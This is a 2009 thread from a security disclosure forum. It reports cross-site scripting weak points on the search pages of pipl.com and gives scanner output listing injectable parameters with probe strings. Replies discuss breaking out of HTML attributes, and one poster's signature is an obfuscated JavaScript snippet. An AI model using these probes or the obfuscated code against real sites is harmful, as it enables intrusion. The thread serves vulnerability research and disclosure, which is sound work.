Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pipl xss issues
Posted by: holiman
Date: January 30, 2009 07:59AM

PDP wrote about Pipl.com (http://www.gnucitizen.org/blog/deep-inspection-of-online-personas/ ), so I tested it, and in the same time tested the little xss-tool I wrote about under Projects. I made a search for Joe Dimaggio, and then tested the resulting page for xss. THat is a site that has issues.

Related question : if a site allows < ' into a <input value="foo<>''" ... - is that exploitable in any way? They do that a lot, but at a few places they fail all three.


0 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?FirstName=Joehzg<izg"jzg'gzh&LastName=DiMaggio&City=&State=&Country=SE&CategoryID=2&Interface=1&
1 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?FirstName=Joe&LastName=DiMaggiohzg<izg"jzg'gzh&City=&State=&Country=SE&CategoryID=2&Interface=1&
2 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?FirstName=Joe&LastName=DiMaggio&City=hzg<izg"jzg'gzh&State=&Country=SE&CategoryID=2&Interface=1&
5 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?FirstName=Joe&LastName=DiMaggio&City=&State=&Country=SE&CategoryID=2hzg<izg"jzg'gzh&Interface=1&
67 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?CategoryID=2hzg<izg"jzg'gzh&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joseph&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
70 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggiohzg<izg"jzg'gzh&FirstName=Joseph&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
71 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josephhzg<izg"jzg'gzh&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
73 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joseph&Hint=&City=hzg<izg"jzg'gzh&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
82 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?CategoryID=2hzg<izg"jzg'gzh&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joshua&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
85 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggiohzg<izg"jzg'gzh&FirstName=Joshua&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
86 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joshuahzg<izg"jzg'gzh&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
88 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joshua&Hint=&City=hzg<izg"jzg'gzh&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
97 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?CategoryID=2hzg<izg"jzg'gzh&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josiah&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
100 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggiohzg<izg"jzg'gzh&FirstName=Josiah&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
101 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josiahhzg<izg"jzg'gzh&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
103 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josiah&Hint=&City=hzg<izg"jzg'gzh&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&

Options: ReplyQuote
Re: Pipl xss issues
Posted by: Matt Presson
Date: January 30, 2009 08:56AM

If the input is being returned in an attribute, a better question would be do they allow the double quote. If so, then try > and <. If they don't allow the double quote - or whatever character they are using to enclose the attribute value - then you are stuck - at least on that attribute.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: Pipl xss issues
Posted by: holiman
Date: January 30, 2009 11:37AM

Yeah, well, if they allow " then it's trivial. I was wondering if there is any other way to break out, --!> or some %00-sign or anything. Guess not.

Options: ReplyQuote


Sorry, only registered users may post in this forum.